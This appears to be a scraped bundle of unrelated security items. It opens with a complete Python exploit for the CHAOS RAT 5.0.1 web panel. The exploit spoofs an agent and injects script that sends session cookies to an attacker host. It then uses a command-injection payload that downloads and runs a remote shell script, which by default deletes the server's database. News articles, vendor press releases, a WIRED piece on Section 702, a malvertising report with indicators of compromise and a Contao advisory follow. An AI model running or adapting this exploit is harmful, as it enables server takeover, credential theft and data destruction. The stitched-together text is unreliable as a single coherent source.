CHAOS RAT web panel version 5.0.1 is vulnerable to command injection, which can be triggered from a cross site scripting attack, allowing an attacker to takeover the RAT server.

    # Exploit Title: CHAOS RAT v5.0.1 RCE# Date: 2024-04-05# Exploit Author: @_chebuya# Software Link: https://github.com/tiagorlampert/CHAOS# Version: v5.0.1 # Tested on: Ubuntu 20.04 LTS# CVE: CVE-2024-30850, CVE-2024-31839# Description: The CHAOS RAT web panel is vulnerable to command injection, which can be triggered from an XSS, allowing an attacker to takeover the RAT server# Github: https://github.com/chebuya/CVE-2024-30850-chaos-rat-rce-poc# Blog: https://blog.chebuya.com/posts/remote-code-execution-on-chaos-rat-via-spoofed-agents/import timeimport requestsimport threadingimport jsonimport websocketimport http.clientimport argparseimport sysimport refrom functools import partialfrom http.server import BaseHTTPRequestHandler, HTTPServerclass Collector(BaseHTTPRequestHandler):    def __init__(self, ip, port, target, command, video_name, *args, **kwargs):        self.ip = ip        self.port = port        self.target = target        self.shell_command = command        self.video_name = video_name         super().__init__(*args, **kwargs)    def do_GET(self):        if self.path == "/loader.sh":            self.send_response(200)            self.end_headers()            command = str.encode(self.shell_command)            self.wfile.write(command)        elif self.path == "/video.mp4":            with open(self.video_name, 'rb') as f:                self.send_response(200)                self.send_header('Content-type', 'video/mp4')                self.end_headers()                self.wfile.write(f.read())        else:            cookie = self.path.split("=")[1]            self.send_response(200)            self.end_headers()            self.wfile.write(b"")            background_thread = threading.Thread(target=run_exploit, args=(cookie, self.target, self.ip, self.port))            background_thread.start()def convert_to_int_array(string):    int_array = []    for char in string:        int_array.append(ord(char))    return int_arraydef extract_client_info(path):    with open(path, 'rb') as f:        data = str(f.read())    address_regexp = r"main\.ServerAddress=(?:[0-9]{1,3}\.){3}[0-9]{1,3}"    address_pattern = re.compile(address_regexp)    address = address_pattern.findall(data)[0].split("=")[1]    port_regexp = r"main\.Port=\d{1,6}"    port_pattern = re.compile(port_regexp)    port = port_pattern.findall(data)[0].split("=")[1]    jwt_regexp = r"main\.Token=[a-zA-Z0-9_\.\-+/=]*\.[a-zA-Z0-9_\.\-+/=]*\.[a-zA-Z0-9_\.\-+/=]*"    jwt_pattern = re.compile(jwt_regexp)    jwt = jwt_pattern.findall(data)[0].split("=")[1]    return f"{address}:{port}", jwtdef keep_connection(target, cookie, hostname, username, os_name, mac, ip):    print("Spoofing agent connection")    headers = {            "Cookie": f"jwt={cookie}"    }    while True:        data = {"hostname": hostname, "username":username,"user_id": username,"os_name": os_name, "os_arch":"amd64", "mac_address": mac, "local_ip_address": ip, "port":"8000", "fetched_unix":int(time.time())}        r = requests.get(f"http://{target}/health", headers=headers)        r = requests.post(f"http://{target}/device", headers=headers, json=data)        time.sleep(30)def handle_command(target, cookie, mac, ip, port):    print("Waiting to serve malicious command outupt")    headers = {        "Cookie": f"jwt={cookie}",        "X-Client": mac    }    ws = websocket.WebSocket()    ws.connect(f'ws://{target}/client', header=headers)    while True:        response = ws.recv()        command = json.loads(response)['command']        data = {"client_id": mac, "response": convert_to_int_array(f"</pre><script>var i = new Image;i.src='http://{ip}:{port}/'+document.cookie;</script><video loop controls autoplay><source src=\"http://{ip}:{port}/video.mp4\" type=\"video/mp4\"></video>"), "has_error": False}        ws.send_binary(json.dumps(data))def run_exploit(cookie, target, ip, port):    print(f"Exploiting {target} with JWT {cookie}")    conn = http.client.HTTPConnection(target)    headers = {        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0',        'Content-Type': 'multipart/form-data; boundary=---------------------------196428912119225031262745068932',        'Cookie': f'jwt={cookie}'    }    conn.request(        'POST',        '/generate',        f'-----------------------------196428912119225031262745068932\r\nContent-Disposition: form-data; name="address"\r\n\r\nhttp://localhost\'$(IFS=];b=curl]{ip}:{port}/loader.sh;$b|sh)\'\r\n-----------------------------196428912119225031262745068932\r\nContent-Disposition: form-data; name="port"\r\n\r\n8080\r\n-----------------------------196428912119225031262745068932\r\nContent-Disposition: form-data; name="os_target"\r\n\r\n1\r\n-----------------------------196428912119225031262745068932\r\nContent-Disposition: form-data; name="filename"\r\n\r\n\r\n-----------------------------196428912119225031262745068932\r\nContent-Disposition: form-data; name="run_hidden"\r\n\r\nfalse\r\n-----------------------------196428912119225031262745068932--\r\n',        headers    )def run(ip, port, target, command, video_name):    server_address = (ip, int(port))    collector = partial(Collector, ip, port, target, command, video_name)    httpd = HTTPServer(server_address, collector)    print(f'Server running on port {ip}:{port}')    httpd.serve_forever()if __name__ == "__main__":    parser = argparse.ArgumentParser()    subparsers = parser.add_subparsers(dest="option")    exploit = subparsers.add_parser("exploit")    exploit.add_argument("-f", "--file",  help="The path to the CHAOS client")    exploit.add_argument("-t", "--target", help="The url of the CHAOS server (127.0.0.1:8080)")    exploit.add_argument("-c", "--command", help="The command to use", default=r"find / -name chaos.db -exec rm -f {} \;")    exploit.add_argument("-v", "--video-name", help="The video name to use", default="rickroll.mp4")    exploit.add_argument("-j", "--jwt", help="The JWT token to use")    exploit.add_argument("-l", "--local-ip", help="The local IP to use for serving bash script and mp4", required=True)    exploit.add_argument("-p", "--local-port", help="The local port to use for serving bash script and mp4", default=8000)    exploit.add_argument("-H", "--hostname", help="The hostname to use for the spoofed client", default="DC01")    exploit.add_argument("-u", "--username", help="The username to use for the spoofed client", default="Administrator")    exploit.add_argument("-o", "--os", help="The OS to use for the spoofed client", default="Windows")    exploit.add_argument("-m", "--mac", help="The MAC address to use for the spoofed client", default="3f:72:58:91:56:56")    exploit.add_argument("-i", "--ip", help="The IP address to use for the spoofed client", default="10.0.17.12")    extract = subparsers.add_parser("extract")    extract.add_argument("-f", "--file", help="The path to the CHAOS client", required=True)    args = parser.parse_args()    if args.option == "exploit":        if args.target != None and args.jwt != None:            target = args.target            jwt = args.jwt        elif args.file != None:            target, jwt = extract_client_info(args.file)        else:            exploit.print_help(sys.stderr)            sys.exit(1)        bg = threading.Thread(target=keep_connection, args=(target, jwt, args.hostname, args.username, args.os, args.mac, args.ip))        bg.start()        cmd = threading.Thread(target=handle_command, args=(target, jwt, args.mac, args.local_ip, args.local_port))        cmd.start()        server = threading.Thread(target=run, args=(args.local_ip, args.local_port, target, args.command, args.video_name))        server.start()    elif args.option == "extract":        target, jwt = extract_client_info(args.file)        print(f"CHAOS server: {target}\nJWT: {jwt}")    else:        parser.print_help(sys.stderr)        sys.exit(1)

CHAOS RAT 5.0.1 Remote Command Execution

On April 9, Twitter/X began automatically modifying links that mention "twitter.com" to redirect to "x.com" instead. But over the past 48 hours, dozens of new domain names have been registered that demonstrate how this change could be used to craft convincing phishing links -- such as fedetwitter[.]com, which is currently rendered as fedex.com in tweets.

On April 9, Twitter/X began automatically modifying links that mention “twitter.com” to read “x.com” instead. But over the past 48 hours, dozens of new domain names have been registered that demonstrate how this change could be used to craft convincing phishing links — such as **fedetwitter\[.\]com**, which until very recently rendered as **fedex.com** in tweets.

The message displayed when one visits carfatwitter.com, which Twitter/X displayed as carfax.com in tweets and messages.

A search at DomainTools.com shows at least 60 domain names have been registered over the past two days for domains ending in “twitter.com,” although research so far shows the majority of these domains have been registered “defensively” by private individuals to prevent the domains from being purchased by scammers.

Those include **carfatwitter.com**, which Twitter/X truncated to carfax.com when the domain appeared in user messages or tweets. Visiting this domain currently displays a message that begins, “Are you serious, X Corp?”

**Update:** It appears Twitter/X has corrected its mistake, and no longer truncates any domain ending in “twitter.com” to “x.com.”

_Original story:_

The same message is on other newly registered domains, including **goodrtwitter.com** (goodrx.com), **neobutwitter.com** (neobux.com), **roblotwitter.com** (roblox.com), **square-enitwitter.com** (square-enix.com) and yandetwitter.com (yandex.com). The message left on these domains indicates they were defensively registered by a user on Mastodon whose bio says they are a systems admin/engineer. That profile has not responded to requests for comment.

A number of these new domains including “twitter.com” appear to be registered defensively by Twitter/X users in Japan. The domain netflitwitter.com (netflix.com, to Twitter/X users) now displays a message saying it was “acquired to prevent its use for malicious purposes,” along with a Twitter/X username.

The domain mentioned at the beginning of this story — fedetwitter.com — redirects users to the blog of a Japanese technology enthusiast. A user with the handle “amplest0e” appears to have registered **space-twitter.com**, which Twitter/X users would see as the CEO’s “space-x.com.” The domain “ametwitter.com” already redirects to the real americanexpress.com.

Some of the domains registered recently and ending in “twitter.com” currently do not resolve and contain no useful contact information in their registration records. Those include **firefotwitter\[.\]com** (firefox.com), **ngintwitter\[.\]com** (nginx.com), and **webetwitter\[.\]com** (webex.com).

The domain setwitter.com, which Twitter/X until very recently rendered as “sex.com,” redirects to this blog post warning about the recent changes and their potential use for phishing.

**Sean McNee**, vice president of research and data at DomainTools, told KrebsOnSecurity it appears Twitter/X did not properly limit its redirection efforts.

“Bad actors could register domains as a way to divert traffic from legitimate sites or brands given the opportunity — many such brands in the top million domains end in x, such as webex, hbomax, xerox, xbox, and more,” McNee said. “It is also notable that several other globally popular brands, such as Rolex and Linux, were also on the list of registered domains.”

The apparent oversight by Twitter/X was cause for amusement and amazement from many former users who have migrated to other social media platforms since the new CEO took over. **Matthew Garrett**, a lecturer at U.C. Berkeley’s School of Information, summed up the Schadenfreude thusly:

“Twitter just doing a ‘redirect links in tweets that go to x.com to twitter.com instead but accidentally do so for all domains that end x.com like eg spacex.com going to spacetwitter.com’ is not absolutely the funniest thing I could imagine but it’s high up there.”

Twitter’s Clumsy Pivot to X.com Is a Gift to Phishers

Find out what sensitive data of yours is exposed online today with our new, free Digital Footprint Portal.

Digital security is about so much more than malware. That wasn’t always the case. 

When I started Malwarebytes more than 16 years ago, malware was the primary security concern—the annoying pop-ups, the fast-spreading viruses, the catastrophic worms—and throughout our company’s history, Malwarebytes routinely excelled against this threat. We caught malware that other vendors missed, and we pioneered malware detection methods beyond the signature-based industry standard.  

I’m proud of our success, but it wasn’t just our technology that got us here. It was our attitude.  

At Malwarebytes, we believe that everyone has the right to a secure digital life, no matter their budget, which is why our malware removal tool was free when it launched and remains free today. Our ad blocking tool, Browser Guard is also available to all without a charge. This was very much _not_ the norm in cybersecurity, but I believe it was—and will always be—the right thing to do.  

Today, I am proud to add to our legacy of empowering individuals regardless of their wallet by releasing a new, free tool that better educates and prepares people for modern threats that abuse exposed data to target online identities. I’d like to welcome everyone to try our new Digital Footprint Portal.  

See your exposed data in our new Digital Footprint Portal.

By simply entering an email address, anyone can discover what information of theirs is available on the dark web to hackers, cybercriminals, and scammers. From our safe portal, everyday people can view past password breaches, active social media profiles, potential leaks of government ID info, and more.  

More than a decade ago, Malwarebytes revolutionized the antivirus industry by prioritizing the security of all individuals. Today, Malwarebytes is now also revolutionizing digital life protection by safeguarding the data that serves as the backbone of your identity, your privacy, your reputation, and your well-being online.  

****Why data matters** **

I can’t tell you how many times I’ve read that “data is the new oil” without reading any explanations as to why people should care.  

Here’s my attempt at clarifying the matter: Too much of our lives are put online without our control.  

Creating a social media account requires handing over your full name and birthdate. Completing any online shopping order requires detailing your address and credit card number. Getting approved for a mortgage requires the exchange of several documents that reveal your salary and your employer. Buying a plane ticket could necessitate your passport info. Messaging your doctor could involve sending a few photos that you’d like to keep private.  

As we know, a lot of this data is valuable to advertisers—this is what pundits focus on when they invoke the value of “oil” in discussing modern data collection—but this data is also valuable to an entirely separate group that has learned to abuse private information in novel and frightening ways: Cybercriminals.  

Long ago, cybercriminals would steal your username and password by fooling you with an urgently worded phishing email. Today, while this tactic is still being used, there’s a much easier path to data theft. Cybercriminals can simply buy your information on the dark web.  

That information can include credit card numbers—where the risk of financial fraud is obvious—and even more regulated forms of identity, like Social Security Numbers and passport info. Equipped with enough forms of “proof,” online thieves can fool a bank into routing your money elsewhere or trick a lender into opening a new line of credit in your name.  

Where the risk truly lies, however, is in fraudulent account access.  

If you’ve ever been involved in a company’s data breach (which is extremely likely), there’s a chance that the username and password that were associated with that data breach can be bought on the dark web for just pennies. Even though each data breach involves just one username and password for each account, cybercriminals know that many people frequently reuse passwords across multiple accounts. After illegally purchasing your login credentials that were exposed in one data breach, thieves will use those same credentials to try to log into more popular, sensitive online accounts, like your online banking, your email, and your social media.  

If any of these attempts at digital safe-cracking works, the potential for harm is enormous.  

With just your email login and password, cybercriminals can ransack photos that are stored in an associated cloud drive and use those for extortion. They can search for attachments that reveal credit card numbers, passport info, and ID cards and then use that information to fool a bank into letting them access your funds. They can pose as you in bogus emails and make fraudulent requests for money from your family and friends. They can even change your password and lock you out forever. 

This is the future of personal cybercrime, and as a company committed to stopping cyberthreats everywhere, we understand that we have a role to play in protecting people.  

We will always stop malware. We will always advise to create and use unique passwords and multifactor authentication. But today, we’re expanding our responsibility and helping you truly see the modern threats that could leverage your data.  

With the Digital Footprint Portal, who you are online is finally visible to you—not just cybercriminals. Use it today to understand where your data has been leaked, what passwords have been exposed, and how you can protect yourself online.  

****Digitally safe** **

Malwarebytes and the cybersecurity industry at large could not have predicted today’s most pressing threats against online identities and reputations, but that doesn’t mean we get to ignore them. The truth is that Malwarebytes was founded with a belief broader than anti-malware protection. Malwarebytes was founded to keep people safe.  

As cybercriminals change their tactics, as scammers needle their way onto online platforms, and as thieves steal and abuse the sensitive data that everyone places online, Malwarebytes will always stay one step ahead. The future isn’t about worms, viruses, Trojans, scams, pig butchering, or any other single scam. It’s about holistic digital life protection. We’re excited to help you get there.

 Introducing the Digital Footprint Portal 

Threat actors are now taking advantage of GitHub's search functionality to trick unsuspecting users looking for popular repositories into downloading spurious counterparts that serve malware.
The latest assault on the open-source software supply chain involves concealing malicious code within Microsoft Visual Code project files that's designed to download next-stage payloads from a remote URL,

Beware: GitHub's Fake Popularity Scam Tricking Developers into Downloading Malware

We all know passwords and firewalls are important, but what about the invisible threats lurking beneath the surface of your systems?
Identity Threat Exposures (ITEs) are like secret tunnels for hackers – they make your security way more vulnerable than you think.
Think of it like this: misconfigurations, forgotten accounts, and old settings are like cracks in your digital fortress walls. Hackers

Webinar: Learn How to Stop Hackers from Exploiting Hidden Identity Weaknesses

A cheat sheet for all of the most common techniques hackers use, and general principles for stopping them.

Source: Kristoffer Tripplaar via Alamy Stock Photo

Of the hundreds of documented MITRE ATT&CK techniques, two dominate the field: command and scripting interpreters (T1059) and phishing (T1566).

In a report published on April 10, D3 Security analyzed more than 75,000 recent cybersecurity incidents. Its goal was to determine which methods of attack were most common.

The results paint a stark picture: those two techniques outpaced all others by orders of magnitude, with the top technique outpacing the runner-up by a factor of three.

For defenders looking to allocate limited attention and resources, here are just some of the most common ATT&CK techniques, and how to defend against them.

**Execution: Command and Scripting Interpreter (Used in 52.22% of Attacks)**

What it is: Attackers write scripts in popular languages like PowerShell and Python for two primary purposes. Most commonly, they're used to automate malicious tasks such as harvesting data or downloading and extracting a payload. They're also useful for evading detection — bypassing antivirus solutions, extended detection and response (XDR), and the like.

That these scripts are far and away No. 1 on this list is extra surprising to Adrianna Chen, D3's vice president of product and service. "Since Command and Scripting Interpreter (T1059) falls under the Execution tactic, it is in the middle stage of the MITRE ATT&CK kill chain," she says. "So, it is fair to assume that other techniques from earlier tactics have already gone undetected by the time that it's detected by the EDR tool. Given that this one technique was so prominent in our data set, it underscores the importance of having processes to trace back to the origin of an incident."

How to defend against it: Because malicious scripts are diverse and multifaceted, dealing with them requires a thorough incident response plan that combines detection of potentially malicious behaviors with strict watch over privileges and script execution policies.

**Initial Access: Phishing (15.44%)**

What it is: Phishing and its subcategory, spear-phishing (T1566.001-004), are the first and third most common ways attackers gain access to targeted systems and networks. Using the first in general campaigns and the second when aiming for specific individuals or organizations, the goal is to coerce victims into divulging crucial information that will allow a foothold into sensitive accounts and devices.

How to defend against it: Even the smartest and most educated among us fall for sophisticated social engineering. Frequent education and awareness campaigns can go some ways toward protecting employees from themselves and the companies they provide a window into.

**Initial Access: Valid Accounts (3.47%)**

What it is: Often, successful phishing allows attackers access to legitimate accounts. These accounts provide keys to otherwise locked doors, and cover for their various misdeeds.

How to defend against it: When employees inevitably click on that malicious PDF or URL, robust multifactor authentication (MFA) can, if nothing else, act as more hoops for attackers to jump through. Anomaly detection tools can also help if, for example, a strange user connects from a faraway IP address, or simply does something they aren't expected to do.

**Credential Access: Brute Force (2.05%)**

What it is: A more popular option back in the olden days, brute force attacks have stuck around thanks to the ubiquity of weak, reused, and unchanged passwords. Here, attackers use scripts that automatically run through username and password combinations — such as in a dictionary attack — to gain access to desired accounts.

How to defend against it: No item on this list is as easily and wholly preventable as brute-force attacks. Using strong enough passwords fixes the problem on its own, full stop. Other little mechanisms, like locking out a user after repeated login attempts, also do the trick.

**Persistence: Account Manipulation (1.34%)**

What it is: Once an attacker has used phishing, brute force, or some other means to access a privileged account, they can then leverage that account to cement their position in a targeted system. For example, they can change the account's credentials to lock out its original owner, or possibly adjust permissions in order to access even more privileged resources than they already have.

How to defend against it: To mitigate the damage from an account compromise, D3 recommends organizations implement stringent restrictions for accessing sensitive resources, and follow the principle of least privileged access: granting no more than the minimum level of access necessary for any user to perform his or her job.

Besides that, it offers a number of recommendations that can apply to this and other MITRE techniques, including:

*   Maintaining vigilance through continuous monitoring of logs to detect and respond to any suspicious account activities
    
*   Operating under the assumption that the network has already been compromised and adopting proactive measures to mitigate potential damage
    
*   Streamlining response efforts by automating countermeasures upon detection of confirmed security breaches, ensuring swift and effective mitigation
    

**About the Author(s)**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

Top MITRE ATT&amp;CK Techniques and How to Defend Against Them

PRESS RELEASE

SAN DIEGO, April 9, 2024/PRNewswire/ -- ESET, a global leader in digital security, is pleased to announce the introduction of ESET Small Business Security, which has been specifically designed to meet the cybersecurity needs of Small Office/Home Office business owners.

According to the Small Business Administration, out of the 33.3 million small businesses in the United States, over 27 million are managed solely by their owners and do not employ any additional personnel. Over 5 million small businesses have under 19 employees1. ESET's new comprehensive security solution is engineered to provide seamless, user-friendly protection, enabling these smaller SMBs to thrive in an increasingly digital landscape.

"This new offering is a testament to ESET's commitment to innovation and its dedication to supporting the growth and security of entrepreneurs, small businesses and home offices," said Brent McCarty, President of ESET North America. "Small businesses have long demanded the power of ESET in a right-sized offering. With this launch, we provide SOHO business owners with a simple yet powerful solution for their businesses that is easily manageable, highly reliable, and tailored to their needs, enabling them to focus on their growth without compromising on security."

The ESET Small Business Security solution supports up to 25 devices and offers an array of features tailored to safeguard online banking transactions and browsing, secure devices, manage passwords, protect Windows servers, encrypt sensitive data, guard against ransomware and counter phishing scams. Furthermore, the offering facilitates safe and anonymous browsing alongside unlimited VPN security where applicable, ensuring both work and personal devices are shielded from cyber threats. This new offering guarantees reliable security with a minimal system footprint, ensuring efficient protection across multiple operating systems, including Windows, Android, and macOS.

ESET Small Business Security includes ESET HOME, security management platform that enables users to have complete security management with information about security status, devices, subscriptions and features currently in use.

ESET HOME is available via a web portal and a mobile application, allowing users to have security of their devices under control anywhere they go.

For more detailed information about ESET Small Business Security, visit here.

About ESET  
For more than 30 years, ESET® has been developing industry-leading IT security software and services to protect businesses, critical infrastructure, and consumers worldwide from increasingly sophisticated digital threats. From endpoint and mobile security to endpoint detection and response, as well as encryption and multifactor authentication, ESET's high-performing, easy-to-use solutions unobtrusively protect and monitor 24/7, updating defenses in real time to keep users safe and businesses running without interruption. Evolving threats require an evolving IT security company that enables the safe use of technology. This is backed by ESET's R&D centers worldwide, working in support of our shared future. For more information, visit www.eset.com or follow us on LinkedIn, Facebook, and Twitter (X).

ESET Launches a New Solution for Small Office/Home Office Businesses

The US Congress will this week decide the fate of Section 702, a major surveillance program that will soon expire if lawmakers do not act. WIRED is tracking the major developments as they unfold.

The United States government, like its rivals in Moscow and Beijing, has poured untold millions of dollars into quietly turning the phones and internet browsers of its own citizens into a powerful intelligence-gathering tool. Shadowy deals between federal agencies and commercial data brokers have helped the US intelligence system to amass a “large amount” of what its own experts term “intimate information” on Americans.

Most US citizens are in the dark as to the true scope and scale of the surveillance they’re under.

House speaker Mike Johnson—whose brief tenure as speaker has been roiled by an ongoing debate over domestic intelligence abuses—previously supported several privacy measures that, now in power, he is working to defeat, including strong new limits on the government’s access to private data.

This week, Johnson is working to resolve the lingering issue of reauthorizing Section 702, a key foreign surveillance program authorized by Congress to target terrorists, cybercriminals, and narcotics traffickers overseas. The program is set to officially expire on April 19.

Congressional sources tell WIRED that a vote to salvage the program could come as early as Thursday, following a series of scheduled briefings on Tuesday and Wednesday between lawmakers and intelligence officials, as well as a number of smaller votes that may significantly modify the terms of the program for years to come.

The focus of privacy advocates has turned almost entirely to an amendment that aims to force the FBI and other agencies to apply for a warrant before accessing the communications of Americans _incidentally_ captured by the US under the 702 program.

Thursday’s vote over the 702 program is at least the third scheduled by the speaker since December. As Johnson has in each case waited until the final moment to delay the vote, a fog of uncertainty surrounds the whole of the process. Privately, lawmakers are discussing next steps should the speaker decide to simply let the program expire, avoiding new statutory limits on the government's most-prized surveillance weapon.

To keep pace with a situation that is sure to evolve rapidly over the next 48 hours, WIRED will update this article with the latest details as they become available. See below for the latest developments.

**House Intel Chair Fires Back at Warrant Seekers**

“We are here,” representative Mike Turner told the House Rules Committee, “because the intelligence community failed us. The FBI failed us. The intelligence community failed to properly police themselves, and they abused the tools that we gave them under FISA.”

Turner, the GOP chairman of the House Intelligence Committee, testified that, in his opinion, the underlying text of the bill was adequate to curb future surveillance abuses by the FBI; that the abuses of the past had been the result of mistakes made by “rank-and-file” employees; and that the same mistakes could be reasonably avoided today by merely asking higher ranking officers to sign off before granting access to wiretaps of Americans’ calls and texts.

Throughout his testimony, Turner discussed the 702 program in terms that focused strictly on its use against terrorist organizations, at times implying that only the communications of Americans in direct contact with foreigners who “represent a national security threat to the United States” are swept up by the program.

In fact, no foreigner is required to have ties to terrorism or be suspected of a crime against the US to be considered a legitimate 702 target. Far less discerning, one of the stated purposes of the program is to gather information relevant to the “conduct of foreign affairs”—a phrase that legal experts contend is so vague as to apply to “almost any activity.”

**What Is Section 702?**

In the wake of 9/11, US president George W. Bush authorized the National Security Agency (NSA) to eavesdrop on Americans without court-approved warrants as part of the hunt for evidence of terrorist activity. A federal judge ruled the collection unconstitutional in 2006, as part of a lawsuit brought by the American Civil Liberties Union. (An appeals court later overturned the ruling without challenging the case's merits.)

Rather than end the surveillance, Congress codified the program as Section 702 of the Foreign Intelligence Surveillance Act (FISA), granting itself some authority to enforce procedures ostensibly designed to limit the program's impact on Americans’ civil liberties.

Section 702 explicitly prohibits the government from targeting Americans. The surveillance must instead focus on foreigners who are physically located overseas. Nevertheless, Americans’ communications are routinely swept up by the program.

While denying that it intentionally sets out to eavesdrop on its own citizens, once it has already done so, the US government’s position is that it now has a right to access these “legally collected” communications without a judge’s approval. In 2021 alone, the FBI conducted searches of communications intercepted under 702 more than 3.4 million times.

Last year, after acknowledging that hundreds of thousands of these searches were unlawful, the FBI said it had taken steps to curtail the number of queries carried out by its employees, reporting in 2022 as few as 204,000 searches.

It is impossible to count the number of Americans whose calls, emails, and texts are subject to surveillance under 702, the government claims, arguing that any attempt to reach an accurate figure would only further imperil the privacy of the Americans it surveils.

Congress is currently divided into two factions: Those that believe the FBI should be required to get a warrant before reading or listening to the communications of Americans collected under 702. And those who say warrants are too burdensome a requirement to impose on investigations of national security threats.

**Judiciary Leaders Call Out FBI’s History of Abuse**

Jim Jordan, the Republican chairman of the House Judiciary Committee, and a leading advocate for stronger privacy under 702 among conservatives, drew attention in his testimony Tuesday to the litany of surveillance abuses first reported by _The Washington Post_ one year ago.

Court documents declassified and released by the FISA court last year found that the FBI had misused the 702 program more than 278,000 times, including, as _The Post_ reported, against “crime victims, Jan. 6 riot suspects, people arrested at protests after the policing killing of George Floyd in 2020 and—in one case—19,000 donors to a congressional candidate.”

“The fundamental question, still, is if the FBI wouldn't follow the procedures in place 278,000 times ... are new requirements going to be enough to safeguard American’ liberties?” Jordan says. "When you have the history we have with this organization, relative to not following the rules, we think you need a separate but equal branch of the government to approve a warrant before you can query American citizens' information.”

Jarrold Nadler—Jordan's Democratic counterpart on the Judiciary—concurred, calling even more emphatically on Congress to “rein in abuse of FISA Section 702 authorities by the intelligence community.”

“Yes, there are already laws on the books to protect Americans from unauthorized government surveillance,” says Nadler. “But we know from our oversight efforts and the intelligence community's own reporting that these laws are often disregarded and are at the very least inadequate to keep this powerful surveillance tool in check.”

The House Rules Committee is currently holding a hearing that will determine what the final text of the 702-reauthorization bill will look like and which amendments will be offered up for a vote on the House floor.

Both the House Judiciary and Intelligence committees are expected to offer up several amendments, with the latter aiming to impose new warrant requirements on the FBI prior to querying the 702 database for information on Americans. Watch the hearing below:

Section 702: The Future of the Biggest US Spy Program Hangs in the Balance

Threat actors once again target system administrators via their favorite tools. Learn more about their TTPs and use the IOCs provide to investigate.

In the past couple of weeks, we have observed an ongoing campaign targeting system administrators with fraudulent ads for popular system utilities. The malicious ads are displayed as sponsored results on Google’s search engine page and localized to North America.

Victims are tricked into downloading and running the Nitrogen malware masquerading as a PuTTY or FileZilla installer. Nitrogen is used by threat actors to gain initial access to private networks, followed by data theft and the deployment of ransomware such as BlackCat/ALPHV.

We have reported this campaign to Google but no action has been taken yet. This blog post aims to share the tactics, techniques and procedures (TTPs) as well as indicators of compromise (IOCs) so defenders can take action.

**Step 1: Luring victims in via malicious ads**

The initial intrusion starts from a malicious ad displayed via Google search. We have observed several different advertiser accounts which were all reported to Google. The lures are utilities commonly used by IT admins such as PuTTY and FileZilla.

Online ads from search engine result pages are increasingly being used to deliver malware to corporate users. ThreatDown users that have DNS Filtering can enable ad blocking in their console to prevent such malvertising attacks:

**Step 2: Directing users to lookalike sites**

The malvertising infrastructure deployed by Nitrogen threat actors uses a cloaking page that can either redirect to a decoy site or the infamous Rick Astley video. The redirect to a decoy page can be activated if the campaign is not weaponized yet or if the malicious server detects invalid traffic (bot, crawler, etc.).

The Rick Astley redirect is mostly to mock security researchers investigating this campaign:

Actual lookalike pages are meant for potential victims. They are often good-looking copycats which could easily fool just about anyone:

ThreatDown blocks these malicious websites to prevent your users from being social-engineered into downloading malware:

**Step 3: Deploying malware via a fraudulent installer**

The final step in this malvertising chain consists of downloading and running the malware payload. Nitrogen uses a technique known as DLL sideloading whereby a legitimate and signed executable launches a DLL. In this case, _setup.exe_ (from the Python Software Foundation) sideloads _python311.dll_ (Nitrogen).

ThreatDown via its EDR engine quarantines the malicious DLL immediately. System administrators can log into their console and use the AI-assisted engine to quickly search and review the detection:

**Recommendations**

While there are many phishing training simulations for email threats, we aren’t aware of similar trainings for malvertising. Yet, the threat has become prevalent enough to warrant better user education.

Endpoints can be protected from malicious ads via group policies that restrict traffic coming from the main and lesser known ad networks. Click here for more information about DNS filtering via our Nebula platform.

Endpoint Detection and Response (EDR) is a cornerstone in your security posture, complemented by Managed Detection and Response (MDR) where analysts can quickly alert you of an impending intrusion.

**Indicators of Compromise**

Cloaking domains:

kunalicon\[.\]com  
inzerille\[.\]com  
recovernj\[.\]com

Lookalike sites:

file-zilla-projectt\[.\]org  
puuty\[.\]org  
pputy\[.\]com  
puttyy\[.\]ca

Nitrogen payloads (URLs):

amplex-amplification\[.\]com/wp-includes/FileZilla\_3.66.1\_win64.zip  
newarticles23\[.\]com/wp-includes/putty-64bit-0.80-installer.zip  
support\[.\]hosting-hero\[.\]com/wp-includes/putty-64bit-0.80-installer.zip  
mkt.geostrategy-ec\[.\]com/installer.zip

Nitrogen payloads (SHA256):

ecde4ca1588223d08b4fc314d6cf4bce82989f6f6a079e3eefe8533222da6281
2037ec95c91731f387d3c0c908db95184c93c3b8412b6b3ca3219f9f8ff60945
033a286218baca97da19810446f9ebbaf33be6549a5c260889d359e2062778cf

Nitrogen C2s:

94.156.65\[.\]98  
94.156.65\[.\]115

 Active Nitrogen campaign delivered via malicious ads for PuTTY, FileZilla 

### Impact

If BBCode is enabled for comments, users can inject CSS styles.

### Patches

Update to Contao 4.13.40 or 5.3.4.

### Workarounds

Disable BBCode for comments.

### References

https://contao.org/en/security-advisories/insufficient-bbcode-sanitization

### For more information

If you have any questions or comments about this advisory, open an issue in [contao/contao](https://github.com/contao/contao/issues/new/choose).

**Contao: Insufficient BBCode sanitizer**

Moderate severity GitHub Reviewed Published Apr 9, 2024 in contao/contao • Updated Apr 9, 2024

Tag

#git